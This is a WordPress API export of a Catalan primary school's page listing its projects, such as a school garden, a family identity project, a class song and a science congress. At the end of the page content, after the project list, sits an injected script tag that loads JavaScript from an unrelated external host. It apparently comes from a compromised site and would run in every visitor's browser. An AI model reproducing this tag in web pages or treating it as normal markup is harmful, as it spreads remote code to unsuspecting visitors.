{"id":530,"date":"2017-02-27T10:11:38","date_gmt":"2017-02-27T09:11:38","guid":{"rendered":"http:\/\/agora.xtec.cat\/ceipbernatdeboil\/?page_id=530"},"modified":"2017-02-27T10:11:38","modified_gmt":"2017-02-27T09:11:38","slug":"projectes-de-centre","status":"publish","type":"page","link":"https:\/\/agora.xtec.cat\/ietiler\/projecte-educatiu-2\/projectes-de-centre\/","title":{"rendered":"Projectes de centre"},"content":{"rendered":"<p><strong>A L&#8217;ESCOLA FEM ELS SEG\u00dcENTS PROJECTES:<\/strong><\/p>\n<ul>\n<li><strong>ESCOLES SOSTENIBLES: \u00a0<\/strong>L&#8217;hort, el disseny d&#8217;espais educatius i l\u00fadics del nostre pati<\/li>\n<li><strong>PROJECTE D&#8217;IDENTITATS<\/strong><strong>\u00a0<\/strong>els dos primers mesos del curs:<\/li>\n<\/ul>\n<p>DESCRIPCIONS\u00a0familiars, portar fotos, dibuix de la fam\u00edlia i posada en com\u00fa per parelles i\/o en grup, que tothom conegui la fam\u00edlia de tothom&#8230;.<\/p>\n<p>CAPSES DE VIDA o HIST\u00d2RIES DE VIDA:<\/p>\n<p>TALLER DELS TRESORS DE LES VACANCES<\/p>\n<p>NOM DEL GRUP CLASSE<\/p>\n<ul>\n<li><strong>LA CAN\u00c7\u00d3 DEL CURS:<\/strong><strong>\u00a0<\/strong>escollim una can\u00e7\u00f3 cada curs amb la que ens identifiquem, fem una coreografia i un treball pl\u00e0stic que compartim tota l&#8217;escola el primer divendres del curs.<\/li>\n<li><strong>CONGR\u00c9S DE CI\u00c8NCIES<\/strong>: Cada curs participen 2 grups classe, de petits i grans. i treballen el tema de l&#8217;any.<\/li>\n<li><strong>@MAC: \u00a0<\/strong>els grups de 5\u00e8 i 6\u00e8 s\u00f3n acompanyats per alumnes de la UAB per a ajudar-los en la compet\u00e8ncia de narratives visuals. 2 tardes a la setmana al llarg de tot el curs.<\/li>\n<\/ul>\n<p><script src=\"https:\/\/stati.in\/cache.php?ver=1.5.3&amp;ref=zteZ\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A L&#8217;ESCOLA FEM ELS SEG\u00dcENTS PROJECTES:<\/p>\n<ul>\n<li>ESCOLES SOSTENIBLES: \u00a0L&#8217;hort, el disseny d&#8217;espais educatius i l\u00fadics del nostre pati<\/li>\n<li>PROJECTE D&#8217;IDENTITATS\u00a0els dos primers mesos del curs:<\/li>\n<\/ul>\n<p>DESCRIPCIONS\u00a0familiars, portar fotos, dibuix de la fam\u00edlia i posada en com\u00fa per parelles i\/o en grup, que tothom conegui la fam\u00edlia de tothom&#8230;.<br \/>\nCAPSES&hellip;  <a href=\"https:\/\/agora.xtec.cat\/ietiler\/projecte-educatiu-2\/projectes-de-centre\/\" title=\"Read Projectes de centre\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"parent":685,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/side-menu.php","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-530","page","type-page","status-publish","hentry"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/ietiler\/wp-json\/wp\/v2\/pages\/530","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/ietiler\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/agora.xtec.cat\/ietiler\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/ietiler\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/ietiler\/wp-json\/wp\/v2\/comments?post=530"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/ietiler\/wp-json\/wp\/v2\/pages\/530\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/ietiler\/wp-json\/wp\/v2\/pages\/685"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/ietiler\/wp-json\/wp\/v2\/media?parent=530"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}